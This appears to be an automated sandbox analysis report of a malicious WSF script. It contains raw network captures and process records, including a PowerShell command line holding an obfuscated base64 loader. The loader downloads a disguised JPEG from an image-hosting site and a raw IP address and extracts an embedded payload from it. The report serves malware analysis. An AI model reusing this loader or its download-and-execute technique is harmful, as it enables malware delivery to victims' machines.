2024-02-15 18:42:01 UTC	1369	IN	Data Raw: 76 44 67 54 72 65 47 73 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 61 64 6f 72 20 26 20 73 63 69 73 6d 61 20 26 20 22 51 44 67 54 72 65 6f 44 67 54 72 65 43 51 44 67 54 72 65 62 67 42 31 44 67 54 72 65 47 77 44 67 54 72 65 62 44 67 54 72 65 44 67 54 72 65 73 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 57 77 42 76 44 67 54 72 65 47 49 44 67 54 72 65 61 67 42 6c 44 67 54 72 65 47 4d 44 67 54 72 65 64 44 67 54 72 65 42 62 44 67 54 72 65 46 30 44 67 54 72 65 58 51 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 30 44 67 54 72 65 48 67 44 67 54 72 65 64 44 67 54 72 65 44 67 54 72 65 75 44 67 54 72 65 47 51 44 67 54 72 65 61 51 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 73 63 69 73 6d 61 20 26 20 74 6f 6d 62 Data Ascii: vDgTreGsDgTre" & scisma & tombador & scisma & "QDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreGQDgTreaQBvDgTreHIDgTre" & scisma & tomb
2024-02-15 18:42:01 UTC	1369	IN	Data Raw: e2 98 9f c3 b0 2a 28 e2 98 a0 6e 28 40 28 e2 97 80 28 6f 64 69 6e 67 5d 3a 3a 55 6e 69 28 40 28 e2 97 80 28 6f 64 e2 98 9f c3 b0 2a 28 e2 98 a0 2e 47 e2 98 9f c3 b0 2a 28 e2 98 a0 74 53 74 72 69 6e 67 28 22 0d 0a 20 20 20 20 20 6a 69 70 65 70 65 20 3d 20 6a 69 70 65 70 65 20 26 20 22 5b e2 87 9d e2 96 91 7d 40 2a 79 e2 87 9d e2 96 91 7d 40 2a 22 0d 0a 20 20 20 20 20 6a 69 70 65 70 65 20 3d 20 6a 69 70 65 70 65 20 26 20 22 74 e2 98 9f c3 b0 2a 28 e2 98 a0 22 0d 0a 20 20 20 20 20 6a 69 70 65 70 65 20 3d 20 6a 69 70 65 70 65 20 26 20 22 6d 2e 28 40 28 e2 97 80 28 40 c3 b8 e2 98 9e 40 e2 88 9e 22 0d 0a 20 20 20 20 20 6a 69 70 65 70 65 20 3d 20 6a 69 70 65 70 65 20 26 20 22 6e 76 e2 98 9f c3 b0 2a 28 e2 98 a0 72 22 0d 0a 20 20 20 20 20 6a 69 70 65 70 65 20 3d Data Ascii: (n(@((oding]::Uni(@((od(.G(tString(" jipepe = jipepe & "[}@y}@" jipepe = jipepe & "t(" jipepe = jipepe & "m.(@((@@" jipepe = jipepe & "nv*(r" jipepe =

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49722	172.67.215.45	443	2992	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-15 18:42:25 UTC	128	OUT	GET /images/004/739/228/original/new_image_wsf.jpg?1707826743 HTTP/1.1 Host: uploaddeimagens.com.br Connection: Keep-Alive
2024-02-15 18:42:26 UTC	687	IN	HTTP/1.1 200 OK Date: Thu, 15 Feb 2024 18:42:26 GMT Content-Type: image/jpeg Content-Length: 8371662 Connection: close Last-Modified: Tue, 13 Feb 2024 12:19:03 GMT ETag: "65cb5e37-7fbdce" Cache-Control: max-age=2678400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=saICTkAFedZmYFhP9RL6RcFj5nc2zyYoxfDQQUMov1inZ%2BH6NJa7DLxggdHhun%2FGrfmYtQeVn%2FEQVXGZIDIMUd89QI7Qoi691EhGk%2BP4uJTYsLM0orpX1QViFn9sfd4Ml1veljnl9OD6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 855fb0cffa5819d3-EWR alt-svc: h3=":443"; ma=86400
2024-02-15 18:42:26 UTC	682	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 36 32 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 39 35 0a ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 Data Ascii: JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95CCp"
2024-02-15 18:42:26 UTC	1369	IN	Data Raw: 3f 00 ec 41 f5 38 14 9b 87 b9 a8 d9 fd f0 29 0b 64 72 4d 7e cf 63 f2 24 bb 92 97 18 e3 83 4c dd 8f ad 33 70 02 90 9a 18 58 90 b1 f5 14 c2 de 99 35 1e ff 00 41 48 ce 7d 7f 2a 2c 57 a0 f2 7d e9 15 88 61 c8 e3 bd 47 bb 3d e9 a1 8e 70 39 a2 c2 d4 99 f0 5b 23 a7 a5 46 7a f5 e3 d2 9a 5b 07 1d 0d 37 7f bd 26 86 3f 75 37 34 9b 85 34 b6 09 e7 22 98 27 7d 81 8f 4e 73 4d 0d c8 19 f7 a0 91 d4 d2 6d 04 f4 a2 e6 97 1c ed 8f ad 30 b7 eb 41 fa e6 9a 7d 28 b8 58 70 6e 3d 68 ce 7d aa 3a 46 7e 28 b8 0f 63 c9 15 19 3e f4 c6 6e 7d e9 03 64 fb d2 b8 c9 0b 63 f9 53 1b bf 3f 85 21 6e 47 a5 04 e4 e7 b5 17 1a 42 83 8f a5 21 7c 1a 42 c7 1d a9 84 93 45 c6 d0 e2 f9 f6 a6 96 18 e0 e6 9a cd e9 4d 0e 57 b7 e9 45 c9 6b b0 f6 6c 53 0b 1c f3 cd 21 6c f5 a6 1e 09 e7 8a 68 12 b1 26 73 da 91 Data Ascii: ?A8)drM~c$L3pX5AH}*,W}aG=p9[#Fz[7&?u744"'}NsMm0A}(Xpn=h}:F~(c>n}dcS?!nGB!\|BEMWEklS!lh&s
2024-02-15 18:42:26 UTC	1369	IN	Data Raw: 2b 28 f4 c4 86 fa 19 64 79 b5 01 21 2d 70 ad ca a1 5e 83 6f 62 09 f7 15 9d cf a1 fc 7a d6 62 71 ec 26 05 06 3e 33 83 4e 0a 4f 63 52 2a 67 b5 26 c5 62 df 87 f5 eb ff 00 0b df b5 ee 9b 2a c3 72 d1 34 05 99 43 fc 8c 06 ec 02 31 9e 01 cf b5 66 95 2d b9 9d 89 76 c9 24 e4 e4 9e 4f 3f 8f 5a 98 a6 3d 40 f6 a8 8f b7 34 79 96 97 46 47 b7 04 f6 1f af 7c 51 c5 38 02 73 9e 0d 33 69 ce 33 c7 bd 03 4a c3 1b 07 38 38 a6 b4 65 71 90 09 eb ef 53 2e 41 0c 40 38 e6 96 66 32 be ec 63 da 8b 85 ae 56 da 73 e9 df 14 85 3b e2 a4 27 9a 4a 41 62 17 18 14 8a bb fb e3 eb 52 95 19 f6 a8 dd 70 38 eb 4c 08 c8 db df 34 94 1c e7 9a 2a 86 26 71 d3 ad 0c c7 6e 33 c1 e4 d2 d0 29 58 07 da dd 4f 63 3a 4f 6d 2c 90 4c 87 2b 24 67 0c 38 ec 7a f2 0e 0d 46 d9 6c b3 12 4b 72 7b f3 df 27 af 3d 79 a0 Data Ascii: +(dy!-p^obzbq&>3NOcRg&br4C1f-v$O?Z=@4yFG\|Q8s3i3J88eqS.A@8f2cVs;'JAbRp8L4*&qn3)XOc:Om,L+$g8zFlKr{'=y
2024-02-15 18:42:26 UTC	1369	IN	Data Raw: a1 4b 90 14 12 49 c0 c7 52 69 a7 70 dc 55 23 6d 31 7a e3 34 e9 a0 92 dd ca c8 85 18 73 82 30 79 e9 4c 0b 43 18 f3 c1 f5 a4 a0 f5 a2 a4 41 49 b7 18 a5 a2 90 00 ef f9 51 49 d0 9f 7e 69 73 52 02 30 c8 3e bd 7f 2a 61 07 07 db fc e6 9e 58 7a fb 53 c2 c4 62 72 ce 44 a3 01 40 03 1f 42 73 4d 30 20 28 47 b5 30 8c 75 a9 58 9c 8e 73 4d 35 77 1a d4 4c 71 48 46 29 d4 52 34 1b f8 52 53 99 71 4d a0 06 49 c7 6c 8a 68 19 20 74 cd 48 c3 22 a3 c6 08 3d e9 dc 63 a4 8d a3 23 3d f0 7f 0a 6d 39 9c be 37 12 69 b4 30 b0 51 45 15 24 b4 27 bd 2f 07 a5 14 54 8a c0 e0 29 c0 39 03 bf 6f 53 52 4b 6f 24 0b 13 49 1b 22 ca bb a3 66 e0 32 e7 a8 a8 f1 c8 ed fa d3 9e 59 24 08 1d d9 c2 0d aa 09 c8 51 9c f0 3b 50 2d 86 d0 14 91 9c 71 eb 45 00 9c 11 9e 0d 00 35 8f 4a 4a 07 26 8a a5 d8 62 1e 05 Data Ascii: KIRipU#m1z4s0yLCAIQI~isR0>*aXzSbrD@BsM0 (G0uXsM5wLqHF)R4RSqMIlh tH"=c#=m97i0QE$'/T)9oSRKo$I"f2Y$Q;P-qE5JJ&b
2024-02-15 18:42:26 UTC	1369	IN	Data Raw: d4 84 60 f2 30 7d e9 41 28 41 07 04 50 cc 5c 92 4e 4f 73 4c 76 13 1c 83 e9 4b d6 8e b4 01 9a 4c 96 14 51 40 19 a9 00 a5 e8 69 08 c5 28 c7 7a 00 3a 9f 53 fa d2 93 c7 4a 6d 14 00 53 4f 26 9e 46 06 73 51 f7 eb c5 3b 00 ee bc 54 67 8c f7 a9 8a 32 a0 62 08 0d 9c 66 a3 23 26 90 d0 32 6c 08 72 09 3d 87 6f ad 34 1c 0e 94 b8 c7 7a 36 d0 31 68 a5 03 34 63 9a 00 4c d2 e3 8f 7a 30 70 69 3f 43 eb 40 0a 41 53 cf 06 92 9d 92 ed c9 c9 e0 52 50 02 52 d2 51 40 0a 4e 4d 25 14 50 01 4b d8 d1 8c f6 cd 27 f5 a0 03 a7 b5 3c c8 cd 08 43 ca 83 9c fb 9e c4 d3 29 db c8 52 a0 e0 1e 71 40 00 20 0c 52 d2 75 1d 29 b4 0a c4 d0 95 66 e7 81 44 98 0e 76 fd d3 fa 54 43 fc e2 94 37 18 ed 4b 51 13 5a dd 4b 65 73 15 c4 0e 63 9e 26 0e 92 0e a0 8e 46 3e 86 8b ab 99 6f 6e 65 b8 99 cc 93 4c e6 47 Data Ascii: `0}A(AP\NOsLvKLQ@i(z:SJmSO&FsQ;Tg2bf#&2lr=o4z61h4cLz0pi?C@ASRPRQ@NM%PK'<C)Rq@ Ru)fDvTC7KQZKesc&F>oneLG
2024-02-15 18:42:26 UTC	1369	IN	Data Raw: 59 f2 95 cd a6 84 06 20 dd f8 ab 1a 7d c5 ad a3 ce 6e 6c c5 e0 78 99 50 16 c6 c7 ec c3 e9 e9 4c fb a6 a2 6e fc 71 52 e3 7d 0a 8c fb 95 59 0a e3 27 24 67 9f 6c f4 fc 29 09 dc 0f 3c 54 ae be b5 11 e3 e9 43 89 5c c4 64 1c 54 4c 4e 7d fd aa 7e 49 03 af f2 a6 32 64 e4 71 df 1d 0d 67 cb 62 ae 44 ec 64 cb 1e 4f 1f 87 61 51 b8 c9 03 03 03 8c fa fe 95 af a2 59 e9 57 97 12 c7 ab de cf 61 07 94 4c 72 43 0f 9b 96 03 20 11 91 d4 f7 1f 8d 64 90 4e 33 d4 fb e6 96 fa 58 3a 27 71 98 23 34 d6 e7 f0 a9 48 e6 98 47 07 d6 97 2d f5 05 2b 11 18 9b 1b f1 f2 8e fd b9 f4 a7 45 75 3d ba 4f 1c 52 c9 1c 73 28 49 55 18 81 20 c8 60 08 cf 62 a0 e3 da 9c 77 79 7b 4b 1c 75 c7 6a 41 19 72 06 ec 13 c6 71 ef 59 b5 dc d6 32 b1 58 a8 07 39 cf e1 8a 42 39 ab 37 11 04 90 85 7d e3 d6 a1 f2 c8 39 Data Ascii: Y }nlxPLnqR}Y'$gl)<TC\dTLN}~I2dqgbDdOaQYWaLrC dN3X:'q#4HG-+Eu=ORs(IU `bwy{KujArqY2X9B97}9
2024-02-15 18:42:26 UTC	1369	IN	Data Raw: 8d 6f 55 d1 ef 35 5b 4d 26 fe ef 4a b1 4d d7 37 b1 5b bb c3 00 c8 19 77 00 85 e4 81 92 47 5a c7 62 01 3d ea 53 12 ba dd 06 05 35 93 34 b9 34 31 20 0a 63 63 0e 7b d2 1c f6 a7 9e 94 d2 31 c8 e6 82 2c 46 d4 da 71 5e 49 f5 a6 d3 6a c6 97 10 8a 6e 39 cd 3e 82 b9 e9 52 2d 44 dd d3 d2 95 79 e4 f4 a3 67 bd 38 2f 1c 9a 42 b7 50 18 26 9b 9c 11 e9 4f a4 20 1f ad 22 6e 35 fd 47 43 4d a9 31 81 eb 4d c0 eb de 90 c6 91 8a 5c f1 47 5f 6a 4a 56 13 0f c6 91 85 2d 07 9a a1 0c a4 e0 1a 7e 38 a4 29 4c 62 66 93 22 8c 60 1a 6d 21 8a 06 69 d4 8b 8c d3 8f 26 9d ae 26 46 c4 12 2a 32 31 f4 a7 9e a6 9a 46 69 1a 21 b4 e1 d2 9b d2 95 68 b0 c5 c0 a5 a2 8a 57 10 51 40 19 a3 06 98 08 46 45 20 e2 9d 4d 2a 73 c0 e2 93 57 01 43 98 f0 ca 79 f5 a1 55 ee a4 24 f2 79 3c 9a 6b f4 14 d4 62 a7 20 Data Ascii: oU5[M&JM7[wGZb=S5441 cc{1,Fq^Ijn9>R-Dyg8/BP&O "n5GCM1M\G_jJV-~8)Lbf"`m!i&&F21Fi!hWQ@FE MsWCyU$y<kb
2024-02-15 18:42:26 UTC	1369	IN	Data Raw: ef 83 8a 87 38 5e 9f 37 ad 0c 41 01 71 83 eb 48 03 94 f9 7e f2 83 9c 76 34 ce 9e e7 d4 f7 a7 e4 91 d3 81 4d e4 9a 00 50 c7 69 18 07 3c d2 d3 48 c1 e9 8a 4a 60 14 ac 39 f5 1d 69 2a 7b 79 a1 88 c8 66 b7 17 20 a1 55 05 b6 ed 3d 01 e9 ce 3d 0d 20 2b 36 01 3f 97 f2 e2 95 d3 68 1c 83 9e 78 39 e2 93 90 3a e4 f4 e4 63 38 f6 f7 a3 df 02 a8 61 8c 9c 01 9f c2 97 1c fa 52 2b 94 60 c0 e0 8a 7c 8a 11 b3 bb 70 6e 4f b1 a0 69 dc 65 25 1d 68 eb 42 10 30 c0 fc 85 03 a5 48 11 1a 12 de 61 12 e7 01 70 70 47 ae 7a 54 63 8a 05 b1 25 b4 6f 34 f1 c2 9b 43 cc c1 01 73 b4 02 4f 73 d0 63 b9 35 36 a7 a7 be 8f a9 5e d8 5c 98 e5 9e da 47 81 9e 07 de 85 83 60 95 6e 84 1c 13 91 55 18 02 08 c6 41 1d 3b 7b f6 a4 c7 40 09 03 d4 ff 00 85 48 05 2b a1 45 56 e0 e7 b0 e4 fa 72 28 3c 01 eb 49 8e Data Ascii: 8^7AqH~v4MPi<HJ`9i*{yf U== +6?hx9:c8aR+`\|pnOie%hB0HappGzTc%o4CsOsc56^\G`nUA;{@H+EVr(<I
2024-02-15 18:42:26 UTC	1369	IN	Data Raw: e2 83 8e e3 f3 a0 b0 ff 00 eb f6 a6 10 00 a9 9e 55 78 76 84 e0 7a 7f 5a 2c 2b 11 b8 ef 8c 7d 69 94 a4 9e 99 cd 25 0b 41 86 06 d3 eb 4a 47 71 d2 92 81 9e 79 a6 0d d8 fd 3f 27 23 af e5 4d dc 3d 79 a6 ee da 28 c8 3c 7f 5a fd 54 fc c0 52 41 3f d6 9a cd cf 14 3f 4c 0e 95 19 c8 a0 64 aa c0 8a 1a a2 59 01 c0 e9 cd 38 9c 9a 96 52 06 27 a7 43 51 96 39 f4 a7 13 c6 3b fa d4 79 e7 d4 fb 55 14 3b 27 14 9d 4d 29 6a 6e 7a d4 dc 60 cd 9e 07 d2 9b 4a 48 22 9a 4e de b4 ee c6 0c 7d e9 9b cd 0e db 87 14 d3 c7 d6 8d f5 01 c5 89 a6 e7 9a 32 7f 1a 6e 69 8f 71 dd 7b 67 14 d2 c0 03 c7 b5 21 6e 7a f2 69 a4 d4 ee 3b 0a c4 1c 71 82 3b d3 77 0a 4d d4 83 19 eb 4f 41 b1 c5 f0 38 18 3e f4 dd f9 ed f9 50 dc 03 de 9b cf a5 48 58 7b 30 e3 1d 69 84 f7 c6 4d 1d e9 ac 79 a2 e5 d8 0b 64 fa 50 Data Ascii: UxvzZ,+}i%AJGqy?'#M=y(<ZTRA??LdY8R'CQ9;yU;'M)jnz`JH"N}2niq{g!nzi;q;wMOA8>PHX{0iMydP
2024-02-15 18:42:26 UTC	1369	IN	Data Raw: 1c 77 eb 4a dd 4d 2e 44 45 37 6e 78 03 27 ad 48 41 27 a8 a3 26 3c 15 1c ff 00 3a 42 4c 8c 85 f2 0e 50 97 27 86 e4 0a 60 1c 9f 41 fe 7f 4a b9 2d f1 96 d1 61 28 06 09 39 ee 6a a0 3c 1f cf e9 48 ad c4 00 b6 00 19 3d 3d 73 48 c4 90 46 30 7a 54 d6 f2 08 5c 31 19 e7 38 fc 29 92 c9 e6 39 38 c6 79 fe 75 22 5b 11 03 8a 61 39 3c 8c 0a 97 23 69 f5 a8 c8 a2 d7 1a 18 c3 06 92 94 f2 71 e9 49 cf a5 05 ad 03 3d e8 0d ef ed ed 9f 4c d3 a0 88 4d 3c 51 17 58 83 ba ae f7 e0 2e 4f 24 9f 41 9e 6a e6 bb a5 26 8b a9 cb 69 1d fd b6 a4 88 01 fb 4d 99 cc 6d 91 c8 07 db a1 c5 4f 5b 15 7d 2e 55 56 07 d0 1a 31 92 73 f4 a8 b1 f9 55 80 50 5b 9e 3e 7c e6 80 4f b9 1e de 69 ac 36 d2 6e 3b a8 63 91 4a c3 43 93 c9 00 6e 2c 5b 18 f6 14 d6 c7 f0 d3 29 56 a6 d6 2c 69 53 ef 52 25 c4 ab 11 8c 39 Data Ascii: wJM.DE7nx'HA'&<:BLP'`AJ-a(9j<H==sHF0zT\18)98yu"[a9<#iqI=LM<QX.O$Aj&iMmO[}.UV1sUP[>\|Oi6n;cJCn,[)V,iSR%9

Target ID:	0
Start time:	19:41:59
Start date:	15/02/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\rdevuelto_Pagos.wsf"
Imagebase:	0x7ff6206b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	19:42:01
Start date:	15/02/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDkDgTreLwDgTreyDgTreDIDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredwBzDgTreGYDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrewDgTreDcDgTreODgTreDgTreyDgTreDYDgTreNwDgTre0DgTreDMDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreDoDgTreLwDgTrevDgTreDQDgTreNQDgTreuDgTreDcDgTreNDgTreDgTreuDgTreDEDgTreOQDgTreuDgTreDgDgTreNDgTreDgTrevDgTreHgDgTreYQBtDgTreHDgTreDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreXwB3DgTreHMDgTreZgDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZ